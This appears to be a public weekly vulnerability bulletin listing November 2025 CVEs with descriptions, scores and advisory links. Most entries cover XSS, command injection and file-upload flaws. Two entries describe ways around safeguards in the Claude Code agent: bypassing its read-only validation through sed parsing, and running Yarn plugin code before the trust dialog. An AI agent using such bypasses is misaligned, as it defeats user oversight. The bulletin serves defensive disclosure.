| Fortinet--FortiPAM | A Cleartext Storage of Sensitive Information in Memory vulnerability [CWE-316] in Fortinet FortiPAM 1.6.0, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions may allow an authenticated attacker with read-write admin privileges to the CLI to obtain other administrators' credentials via diagnose commands. | 2025-11-18 | 3.8 | CVE-2025-61713 | https://fortiguard.fortinet.com/psirt/FG-IR-25-789   |
| Fortinet--FortiProxy | An Improper Privilege Management vulnerability [CWE-269] in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4 all versions, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiPAM 1.6.0, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.3, FortiProxy 7.4 all versions, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions may allow an authenticated administrator to bypass the trusted host policy via crafted CLI command. | 2025-11-18 | 1.8 | CVE-2025-54821 | https://fortiguard.fortinet.com/psirt/FG-IR-25-545   |
| Gallagher--T21 Reader | Missing Release of Resource after Effective Lifetime (CWE-772) in the T21 Reader allows an attacker with physical access to the Reader to perform a denial-of-service attack against that specific reader, preventing cardholders from badging for entry. This issue affects Command Centre Server: 9.30 prior to vCR9.30.251028a (distributed in 9.30.2881 (MR3)), 9.20 prior to vCR9.20.251028a (distributed in 9.20.3265 (MR5)), 9.10 prior to vCR9.10.251028a (distributed in 9.10.4135 (MR8)),  all versions of 9.00 and prior. | 2025-11-18 | 2.4 | CVE-2025-64734 | https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-64734   |
| HCL Software--Connections | HCL Connections is vulnerable to a sensitive information disclosure vulnerability which could allow a user to obtain sensitive information they are not entitled to, caused by improper rendering of application data. | 2025-11-18 | 3.5 | CVE-2025-52639 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124241   |
| icret--EasyImages | A vulnerability was identified in icret EasyImages up to 2.8.6. This affects an unknown part of the file /app/upload.php of the component SVG Image Handler. The manipulation of the argument File leads to cross site scripting. It is possible to initiate the attack remotely. | 2025-11-19 | 3.5 | CVE-2025-13415 | VDB-332940 | icret EasyImages SVG Image upload.php cross site scripting VDB-332940 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #693732 | GitHub EasyImages2.0 <=V2.8.6 Improper Neutralization of Alternate XSS Syntax https://github.com/icret/EasyImages2.0/issues/260   |
| jarun--nnn | A security vulnerability has been detected in jarun nnn up to 5.1. The impacted element is the function show_content_in_floating_window/run_cmd_as_plugin of the file nnn/src/nnn.c. The manipulation leads to double free. An attack has to be approached locally. The identifier of the patch is 2f07ccdf21e705377862e5f9dfa31e1694979ac7. It is suggested to install a patch to address this issue. | 2025-11-23 | 3.3 | CVE-2025-13566 | VDB-333330 | jarun nnn nnn.c run_cmd_as_plugin double free VDB-333330 | CTI Indicators (IOB, IOC, IOA) Submit #698113 | nnn v5.1 Double Free https://github.com/jarun/nnn/issues/2091#issue-3635886658 https://github.com/jarun/nnn/issues/2091#issuecomment-3547591759 https://github.com/jarun/nnn/commit/2f07ccdf21e705377862e5f9dfa31e1694979ac7   |
| librenms--librenms | LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Prior to version 25.11.0, a weak password policy vulnerability was identified in the user management functionality of the LibreNMS application. This vulnerability allows administrators to create accounts with extremely weak and predictable passwords, such as 12345678. This exposes the platform to brute-force and credential stuffing attacks. This issue has been patched in version 25.11.0. | 2025-11-18 | 3.7 | CVE-2025-65014 | https://github.com/librenms/librenms/security/advisories/GHSA-5mrf-j8v6-f45g   |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.3, 10.5.x <= 10.5.11 fail to enforce access permissions on the Agents plugin which allows other users to determine when users had read channels via channel member objects | 2025-11-18 | 3 | CVE-2025-55074 | https://mattermost.com/security-updates   |
| Medical Informatics Engineering--Enterprise Health | Medical Informatics Engineering Enterprise Health has a stored cross site scripting vulnerability that allows an authenticated attacker to add arbitrary content in the 'Demographic Information' page. This content will be rendered and executed when a victim accesses it. This issue is fixed as of 2025-03-14. | 2025-11-20 | 3.5 | CVE-2025-35029 | url url   |
| n/a--mrubyc | A security vulnerability has been detected in mrubyc up to 3.4. This impacts the function mrbc_raw_realloc of the file src/alloc.c. Such manipulation of the argument ptr leads to null pointer dereference. An attack has to be approached locally. The name of the patch is 009111904807b8567262036bf45297c3da8f1c87. It is advisable to implement a patch to correct this issue. | 2025-11-19 | 3.3 | CVE-2025-13397 | VDB-332925 | mrubyc alloc.c mrbc_raw_realloc null pointer dereference VDB-332925 | CTI Indicators (IOB, IOC, IOA) Submit #692130 | mrubyc 3.4 NULL Pointer Dereference https://github.com/mrubyc/mrubyc/issues/244 https://github.com/mrubyc/mrubyc/issues/244#issuecomment-3400382026 https://github.com/mrubyc/mrubyc/commit/009111904807b8567262036bf45297c3da8f1c87   |
| OpenPrinting--cups-filters | cups-filters contains backends, filters, and other software required to get the cups printing service working on operating systems other than macos. In versions 2.0.1 and prior, a heap-buffer-overflow vulnerability in the rastertopclx filter causes the program to crash with a segmentation fault when processing maliciously crafted input data. This issue can be exploited to trigger memory corruption, potentially leading to arbitrary code execution. This issue has been patched via commit 956283c. | 2025-11-20 | 3.3 | CVE-2025-64524 | https://github.com/OpenPrinting/cups-filters/security/advisories/GHSA-rq44-2q5p-x3hv https://github.com/OpenPrinting/cups-filters/commit/956283c74a34ae924266a2a63f8e5f529a1abd06   |
| Public Knowledge Project--omp | A security vulnerability has been detected in Public Knowledge Project omp and ojs 3.3.0/3.4.0/3.5.0. Impacted is an unknown function of the file plugins/paymethod/manual/templates/paymentForm.tpl of the component Payment Instructions Setting Handler. The manipulation of the argument manualInstructions leads to cross site scripting. The attack can be initiated remotely. You should upgrade the affected component. | 2025-11-20 | 2.4 | CVE-2025-13469 | VDB-333042 | Public Knowledge Project omp/ojs Payment Instructions Setting paymentForm.tpl cross site scripting VDB-333042 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #695020 | Public Knowledge Project Open Journal System 3.5.0-1 Cross Site Scripting https://github.com/pkp/pkp-lib/issues/12022 https://github.com/pkp/pkp-lib/issues/12022#event-20904087480 https://github.com/pkp/pkp-lib/issues/12022#event-20904112770   |
| SourceCodester--Interview Management System | A security flaw has been discovered in SourceCodester Interview Management System 1.0. Affected is an unknown function of the file /editQuestion.php. The manipulation of the argument Question results in cross site scripting. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited. | 2025-11-18 | 3.5 | CVE-2025-13343 | VDB-332761 | SourceCodester Interview Management System editQuestion.php cross site scripting VDB-332761 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #691936 | SourceCodester Interview Management System V1.0 Improper Neutralization of Alternate XSS Syntax https://github.com/puppytgyh/-CVE/issues/11 https://www.sourcecodester.com/   |
| SourceCodester--Online Shop Project | A vulnerability was determined in SourceCodester Online Shop Project 1.0. Impacted is an unknown function of the file /shop/register.php. This manipulation of the argument f_name causes cross site scripting. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2025-11-20 | 3.5 | CVE-2025-13450 | VDB-333020 | SourceCodester Online Shop Project register.php cross site scripting VDB-333020 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694780 | SourceCodester Online Shop Project V1.0 Cross Site Scripting https://github.com/xiaojuzirr/cve/issues/5 https://www.sourcecodester.com/   |
| SourceCodester--Student Grades Management System | A vulnerability has been found in SourceCodester Student Grades Management System 1.0. This issue affects some unknown processing of the file /grades.php of the component Add New Grade Page. The manipulation of the argument Remarks leads to cross site scripting. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2025-11-18 | 3.5 | CVE-2025-13349 | VDB-332766 | SourceCodester Student Grades Management System Add New Grade grades.php cross site scripting VDB-332766 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692065 | SourceCodester Student Grades Management System 1.0 Cross Site Scripting https://medium.com/@ankitkaushal43731/title-student-grades-management-system-stored-xss-authenticated-in-grades-php-remarks-field-d9625243df06 https://www.sourcecodester.com/   |
| Tinexta Infocert--GoSign Desktop | GoSign Desktop through 2.4.1 disables TLS certificate validation when configured to use a proxy server. This can be problematic if the GoSign Desktop user selects an arbitrary proxy server without consideration of whether outbound HTTPS connections from the proxy server to Internet servers succeed even for untrusted or invalid server certificates. In this scenario (which is outside of the product's design objectives), integrity protection could be bypassed. In typical cases of a proxy server for outbound HTTPS traffic from an enterprise, those connections would not succeed. (Admittedly, the usual expectation is that a client application is configured to trust an enterprise CA and does not set SSL_VERIFY_NONE.) Also, it is of course unsafe to place ~/.gosign in the home directory of an untrusted user and then have other users execute downloaded files. | 2025-11-17 | 3.2 | CVE-2025-65083 | https://www.firma.infocert.it/prodotti/gosign https://securityaffairs.com/184672/hacking/multiple-vulnerabilities-in-gosign-desktop-lead-to-remote-code-execution.html   |
| withastro--astro | Astro is a web framework. Prior to version 5.14.3, a vulnerability has been identified in the Astro framework's development server that allows arbitrary local file read access through the image optimization endpoint. The vulnerability affects Astro development environments and allows remote attackers to read any image file accessible to the Node.js process on the host system. This issue has been patched in version 5.14.3. | 2025-11-19 | 3.5 | CVE-2025-64757 | https://github.com/withastro/astro/security/advisories/GHSA-x3h8-62x9-952g https://github.com/withastro/astro/commit/b8ca69b97149becefaf89bf21853de9c905cdbb7   |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 7-Zip--7-Zip | 7-Zip ZIP File Parsing Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of 7-Zip. Interaction with this product is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the handling of symbolic links in ZIP files. Crafted data in a ZIP file can cause the process to traverse to unintended directories. An attacker can leverage this vulnerability to execute code in the context of a service account. Was ZDI-CAN-26753. | 2025-11-19 | not yet calculated | CVE-2025-11001 | ZDI-25-949   |
| AMD--AMD Ryzen 9000HX Series Processors | Improper handling of insufficient entropy in the AMD CPUs could allow a local attacker to influence the values returned by the RDSEED instruction, potentially resulting in the consumption of insufficiently random values. | 2025-11-21 | not yet calculated | CVE-2025-62626 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-7055.html   |
| AMD--Kria SOM | The security state of the calling processor into Arm® Trusted Firmware (TF-A) is not used and could potentially allow non-secure processors access to secure memories, access to crypto operations, and the ability to turn on and off subsystems within the SOC. | 2025-11-23 | not yet calculated | CVE-2025-48507 | https://www.amd.com/en/resources/product-security/bulletin/amd-sb-8017.html   |
| AMD--Versal Adaptive SoC Devices | The Secure Flag passed to Versalâ„¢ Adaptive SoC's Arm® Trusted Firmware for Cortex®-A processors (TF-A) for Arm's Power State Coordination Interface (PSCI) commands were incorrectly set to secure instead of using the processor's actual security state. This would allow the PSCI requests to appear they were from processors in the secure state instead of the non-secure state. | 2025-11-23 | not yet calculated | CVE-2025-54515 | https://www.amd.com/en/resources/product-security/bulletin/amd-sb-8020.html   |
| anthropics--claude-code | Claude Code is an agentic coding tool. Prior to version 2.0.31, due to an error in sed command parsing, it was possible to bypass the Claude Code read-only validation and write to arbitrary files on the host system. This issue has been patched in version 2.0.31. | 2025-11-21 | not yet calculated | CVE-2025-64755 | https://github.com/anthropics/claude-code/security/advisories/GHSA-7mv8-j34q-vp7q   |
| anthropics--claude-code | Claude Code is an agentic coding tool. Prior to version 1.0.39, when running on a machine with Yarn 3.0 or above, Claude Code could have been tricked to execute code contained in a project via yarn plugins before the user accepted the startup trust dialog. Exploiting this would have required a user to start Claude Code in an untrusted directory and to be using Yarn 3.0 or above. This issue has been patched in version 1.0.39. | 2025-11-19 | not yet calculated | CVE-2025-65099 | https://github.com/anthropics/claude-code/security/advisories/GHSA-5hhx-v7f6-x7gv   |
| Apache Software Foundation--Apache Causeway | Apache Causeway faces Java deserialization vulnerabilities that allow remote code execution (RCE) through user-controllable URL parameters. These vulnerabilities affect all applications using Causeway's ViewModel functionality and can be exploited by authenticated attackers to execute arbitrary code with application privileges.  This issue affects all current versions. Users are recommended to upgrade to version 3.5.0, which fixes the issue. | 2025-11-19 | not yet calculated | CVE-2025-64408 | https://lists.apache.org/thread/rjlg4spqhmgy1xgq9wq5h2tfnq4pm70b   |
| Apple--iPadOS | The issue was addressed with improved checks. This issue is fixed in iPadOS 17.7.7, iOS 18.5 and iPadOS 18.5. An attacker with physical access to a device may be able to override managed Wi-Fi profiles. | 2025-11-21 | not yet calculated | CVE-2025-31216 | https://support.apple.com/en-us/122405 https://support.apple.com/en-us/122404   |
| Apple--macOS | A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Ventura 13.7.3, macOS Sequoia 15.5, macOS Sonoma 14.7.3. An app may be able to access sensitive user data. | 2025-11-21 | not yet calculated | CVE-2025-31248 | https://support.apple.com/en-us/122069 https://support.apple.com/en-us/122716 https://support.apple.com/en-us/122070   |
| Apple--macOS | A spoofing issue was addressed with improved truncation when displaying the fully qualified domain name This issue is fixed in Safari 18.5, macOS Sequoia 15.5. A website may be able to spoof the domain name in the title of a pop-up window. | 2025-11-21 | not yet calculated | CVE-2025-31266 | https://support.apple.com/en-us/122716 https://support.apple.com/en-us/122719   |
| Apple--macOS | An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iPadOS 17.7.7, iOS 18.5 and iPadOS 18.5, visionOS 2.5, macOS Sonoma 14.7.3, macOS Ventura 13.7.3, macOS Sequoia 15.5, watchOS 11.5. An attacker in physical proximity may be able to cause an out-of-bounds read in kernel memory. | 2025-11-21 | not yet calculated | CVE-2025-43374 | https://support.apple.com/en-us/122069 https://support.apple.com/en-us/122716 https://support.apple.com/en-us/122405 https://support.apple.com/en-us/122404 https://support.apple.com/en-us/122721 https://support.apple.com/en-us/122722 https://support.apple.com/en-us/122070   |
| ASUSTOR--ABP and AES | When the service of ABP and AES is installed in a directory writable by non-administrative users, an attacker can replace or plant a DLL with the same name as one loaded by the service. Upon service restart, the malicious DLL is loaded and executed under the LocalSystem account, resulting in unauthorized code execution with elevated privileges. This issue affects ABP and AES: from ABP 2.0 through 2.0.7.9050, from AES 1.0 through 1.0.6.8290. | 2025-11-19 | not yet calculated | CVE-2025-13051 | https://www.asustor.com/security/security_advisory_detail?id=48   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 include a web administration component (F2MAdmin) that exposes an unauthenticated script-management endpoint at AudioCodes_files/utils/IVR/diagram/ajaxScript.php. The saveScript action writes attacker-supplied data directly to a server-side file path under the privileges of the web service account, which runs as NT AUTHORITY\\SYSTEM on Windows deployments. A remote, unauthenticated attacker can write arbitrary files into the product's web-accessible directory structure and subsequently execute them. | 2025-11-19 | not yet calculated | CVE-2025-34328 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-file-upload-rce-via-ajaxscript   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 expose an unauthenticated backup upload endpoint at AudioCodes_files/ajaxBackupUploadFile.php in the F2MAdmin web interface. The script derives a backup folder path from application configuration, creates the directory if it does not exist, and then moves an uploaded file to that location using the attacker-controlled filename, without any authentication, authorization, or file-type validation. On default Windows deployments where the backup directory resolves to the system drive, a remote attacker can upload web server or interpreter configuration files that cause a log file or other server-controlled resource to be treated as executable code. This allows subsequent HTTP requests to trigger arbitrary command execution under the web server account, which runs as NT AUTHORITY\\SYSTEM. | 2025-11-19 | not yet calculated | CVE-2025-34329 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-backup-upload-rce-via-ajaxbackupuploadfile   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 include a web administration component (F2MAdmin) that exposes an unauthenticated prompt upload endpoint at AudioCodes_files/utils/IVR/diagram/ajaxPromptUploadFile.php. The script accepts an uploaded file and writes it into the C:\\F2MAdmin\\tmp directory using a filename derived from application constants, without any authentication, authorization, or file-type validation. A remote, unauthenticated attacker can upload or overwrite prompt- or music-on-hold-related files in this directory, potentially leading to tampering with IVR audio content or preparing files for use in further attacks. | 2025-11-19 | not yet calculated | CVE-2025-34330 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-prompt-file-upload-via-ajaxpromptuploadfile   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 contain an unauthenticated file read vulnerability via the download.php script. The endpoint exposes a file download mechanism that lacks access control, allowing remote, unauthenticated users to request files stored on the appliance based solely on attacker-supplied path and filename parameters. While limited to specific file extensions permitted by the application logic, sensitive backup archives can be retrieved, exposing internal databases and credential hashes. Successful exploitation may lead to disclosure of administrative password hashes and other sensitive configuration data. | 2025-11-19 | not yet calculated | CVE-2025-34331 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-unauthenticated-file-read-via-download   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 include a web administration component that controls back-end Windows services using helper batch scripts located under C:\\F2MAdmin\\F2E\\AudioCodes_files\\utils\\Services. When certain service actions are requested through ajaxPost.php, these scripts are invoked by PHP using system() under the NT AUTHORITY\\SYSTEM account. The batch files in this directory are writable by any authenticated local user due to overly permissive ACLs, allowing them to replace script contents with arbitrary commands. On the next service start/stop operation, the modified script is executed as SYSTEM, enabling elevation of local privileges. | 2025-11-19 | not yet calculated | CVE-2025-34332 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-insecure-service-control-scripts-lpe   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 configure the web document root at C:\\F2MAdmin\\F2E with overly permissive file system permissions. Authenticated local users have modify rights on this directory, while the associated web server process runs as NT AUTHORITY\\SYSTEM. As a result, any local user can create or alter server-side scripts within the webroot and then trigger them via HTTP requests, causing arbitrary code to execute with SYSTEM privileges. | 2025-11-19 | not yet calculated | CVE-2025-34333 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-world-writable-webroot-lpe   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 are vulnerable to an authenticated command injection in the fax test functionality implemented by AudioCodes_files/TestFax.php. When a fax "send" test is requested, the application builds a faxsender command line using attacker-supplied parameters and passes it to GlobalUtils::RunBatchFile without proper validation or shell-argument sanitization. The resulting batch file is written into a temporary run directory and then executed via a backend service that runs as NT AUTHORITY\\SYSTEM. An authenticated attacker with access to the fax test interface can craft parameter values that inject additional shell commands into the generated batch file, leading to arbitrary command execution with SYSTEM privileges. In addition, because the generated batch files reside in a location with overly permissive file system permissions, a local low-privilege user on the server can modify pending batch files to achieve the same elevation. | 2025-11-19 | not yet calculated | CVE-2025-34334 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-authenticated-command-injection-via-testfax-and-lpe   |
| AudioCodes Limited--AudioCodes Fax/IVR Appliance | AudioCodes Fax Server and Auto-Attendant IVR appliances versions up to and including 2.6.23 expose an authenticated command injection vulnerability in the license activation workflow handled by AudioCodes_files/ActivateLicense.php. When a license file is uploaded, the application derives a new filename by combining a generated base name with the attacker-controlled extension portion of the original upload name, then constructs a command line for fax_server_lic_cmdline.exe that includes this path. The extension value is incorporated into the command string without input validation, escaping, or proper argument quotation before being passed to exec(). An authenticated user with access to the license upload interface can supply a specially crafted filename whose extension injects additional shell metacharacters, causing arbitrary commands to be executed as NT AUTHORITY\\SYSTEM. | 2025-11-19 | not yet calculated | CVE-2025-34335 | https://www.audiocodes.com/media/g1in2u2o/0548-product-notice-end-of-service-for-audiocodes-auto-attendant-ivr-solution.pdf https://pierrekim.github.io/blog/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html https://pierrekim.github.io/advisories/2025-audiocodes-fax-ivr.txt https://www.vulncheck.com/advisories/audiocodes-fax-ivr-appliance-authenticated-command-injection-via-activatelicense   |
| authlib--joserfc | joserfc is a Python library that provides an implementation of several JSON Object Signing and Encryption (JOSE) standards. In versions from 1.3.3 to before 1.3.5 and from 1.4.0 to before 1.4.2, the ExceededSizeError exception messages are embedded with non-decoded JWT token parts and may cause Python logging to record an arbitrarily large, forged JWT payload. In situations where a misconfigured - or entirely absent - production-grade web server sits in front of a Python web application, an attacker may be able to send arbitrarily large bearer tokens in the HTTP request headers. When this occurs, Python logging or diagnostic tools (e.g., Sentry) may end up processing extremely large log messages containing the full JWT header during the joserfc.jwt.decode() operation. The same behavior also appears when validating claims and signature payload sizes, as the library raises joserfc.errors.ExceededSizeError() with the full payload embedded in the exception message. Since the payload is already fully loaded into memory at this stage, the library cannot prevent or reject it. This issue has been patched in versions 1.3.5 and 1.4.2. | 2025-11-18 | not yet calculated | CVE-2025-65015 | https://github.com/authlib/joserfc/security/advisories/GHSA-frfh-8v73-gjg4 https://github.com/authlib/joserfc/commit/63932f169d924caffafa761af2122b82059017f7 https://github.com/authlib/joserfc/commit/673c8743fd0605b0e1de6452be6cba75f44e466b https://github.com/authlib/joserfc/releases/tag/1.3.5 https://github.com/authlib/joserfc/releases/tag/1.4.2   |
| authzed--spicedb | SpiceDB is an open source database system for creating and managing security-critical application permissions. Prior to version 1.47.1, if a schema includes the following characteristics: permission defined in terms of a union (+) and that union references the same relation on both sides (but one side arrows to a different permission). Then SpiceDB may have missing LookupResources results when checking the permission. This only affects LookupResources; other APIs calculate permissionship correctly. The issue is fixed in version 1.47.1. | 2025-11-21 | not yet calculated | CVE-2025-65111 | https://github.com/authzed/spicedb/security/advisories/GHSA-9m7r-g8hg-x3vr https://github.com/authzed/spicedb/commit/8c2edbe1e7bd3851fa2138f4cc344bfde986dcf2   |
| Automated Logic--WebCtrl | Open Redirect in URL parameter in Automated Logic WebCTRL and Carrier i-Vu versions 6.0, 6.5, 7.0, 8.0, 8.5, 9.0 may allow attackers to exploit user sessions. | 2025-11-19 | not yet calculated | CVE-2024-8527 | https://www.corporate.carrier.com/product-security/advisories-resources/   |
| Automated Logic--WebCtrl | Reflected XSS using a specific URL in Automated Logic WebCTRL and Carrier i-VU can allow delivery of malicious payload due to a specific GET parameter not being sanitized. | 2025-11-19 | not yet calculated | CVE-2024-8528 | https://www.corporate.carrier.com/product-security/advisories-resources/   |
| BASIS International Ltd.--BASIS BBj | BASIS BBj versions prior to 25.00 contain a Jetty-served web endpoint that fails to properly validate or canonicalize input path segments. This allows unauthenticated directory traversal sequences to cause the server to read arbitrary system files accessible to the account running the service. Retrieved configuration artifacts may contain account credentials used for BBj Enterprise Manager; possession of these credentials enables administrative access and use of legitimate management functionality that can result in execution of system commands under the service account. Depending on the operating system and the privileges of the BBj service account, this issue may also allow access to other sensitive files on the host, including operating system or application data, potentially exposing additional confidential information. | 2025-11-20 | not yet calculated | CVE-2025-34320 | https://myemail.constantcontact.com/BASIS-International-Ltd--releases-BBj---the-Barista--Application-Framework--and-AddonSoftware--by-Barista-version-25-00.html?soid=1103463119019&aid=WbfWkReLRVE https://www.vulncheck.com/advisories/basis-bbj-unauthenticated-arbitrary-file-read-rce   |
| BEIMS--Contractor Web | A SQL Injection vulnerability on an endpoint in BEIMS Contractor Web, a legacy product that is no longer maintained or patched by the vendor, allows an unauthorised user to retrieve sensitive database contents via unsanitized parameter input. This vulnerability occurs due to improper input validation on /BEIMSWeb/contractor.asp endpoint and successful exploitation requires a contractor.asp endpoint open to the internet. This vulnerability allows attackers to execute arbitrary SQL commands, compromising the confidentiality, integrity and potentially the availability of the database.  Version 5.7.139  has been confirmed as vulnerable. Other versions have not been confirmed by the vendor and users should assume that all versions of BEIMS Contractor Web may be impacted until further guidance is provided by the vendor. | 2025-11-17 | not yet calculated | CVE-2025-10460 | https://help.fmiworks.com/knowledge/beims-web https://help.fmiworks.com/knowledge/contractor-web-operational-requirements   |
| boldthemes--Bold Page Builder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in boldthemes Bold Page Builder bold-page-builder allows DOM-Based XSS.This issue affects Bold Page Builder: from n/a through <= 5.5.2. | 2025-11-21 | not yet calculated | CVE-2025-66057 | https://vdp.patchstack.com/database/Wordpress/Plugin/bold-page-builder/vulnerability/wordpress-bold-page-builder-plugin-5-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| bPlugins--Tiktok Feed | Missing Authorization vulnerability in bPlugins Tiktok Feed b-tiktok-feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tiktok Feed: from n/a through <= 1.0.22. | 2025-11-21 | not yet calculated | CVE-2025-66110 | https://vdp.patchstack.com/database/Wordpress/Plugin/b-tiktok-feed/vulnerability/wordpress-tiktok-feed-plugin-1-0-22-broken-access-control-vulnerability?_s_id=cve   |
| bqworks--Accordion Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bqworks Accordion Slider accordion-slider allows Stored XSS.This issue affects Accordion Slider: from n/a through <= 1.9.13. | 2025-11-21 | not yet calculated | CVE-2025-66092 | https://vdp.patchstack.com/database/Wordpress/Plugin/accordion-slider/vulnerability/wordpress-accordion-slider-plugin-1-9-13-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| Camille V--Travelers' Map | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Camille V Travelers' Map travelers-map allows Stored XSS.This issue affects Travelers' Map: from n/a through <= 2.3.2. | 2025-11-21 | not yet calculated | CVE-2025-66098 | https://vdp.patchstack.com/database/Wordpress/Plugin/travelers-map/vulnerability/wordpress-travelers-map-plugin-2-3-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| Checkmk GmbH--Checkmk | Insufficient permission validation on multiple REST API endpoints in Checkmk 2.2.0, 2.3.0, and 2.4.0 before version 2.4.0p16 allows low-privileged users to perform unauthorized actions or obtain sensitive information | 2025-11-18 | not yet calculated | CVE-2025-58121 | https://checkmk.com/werk/18983   |
| Checkmk GmbH--Checkmk | Insufficient permission validation in Checkmk 2.4.0 before version 2.4.0p16 allows low-privileged users to modify notification parameters via the REST API, which could lead to unauthorized actions or information disclosure. | 2025-11-18 | not yet calculated | CVE-2025-58122 | https://checkmk.com/werk/18982   |
| Checkmk GmbH--Checkmk | In Checkmk versions prior to 2.4.0p16, 2.3.0p41, and all versions of 2.2.0 and older, the mk_inotify plugin creates world-readable and writable files, allowing any local user on the system to read the plugin's output and manipulate it, potentially leading to unauthorized access to or modification of monitoring data. | 2025-11-18 | not yet calculated | CVE-2025-64996 | https://checkmk.com/werk/18570   |
| Cozmoslabs--WP Webhooks | Deserialization of Untrusted Data vulnerability in Cozmoslabs WP Webhooks wp-webhooks allows Object Injection.This issue affects WP Webhooks: from n/a through <= 3.3.8. | 2025-11-21 | not yet calculated | CVE-2025-66073 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-webhooks/vulnerability/wordpress-wp-webhooks-plugin-3-3-8-php-object-injection-vulnerability?_s_id=cve   |
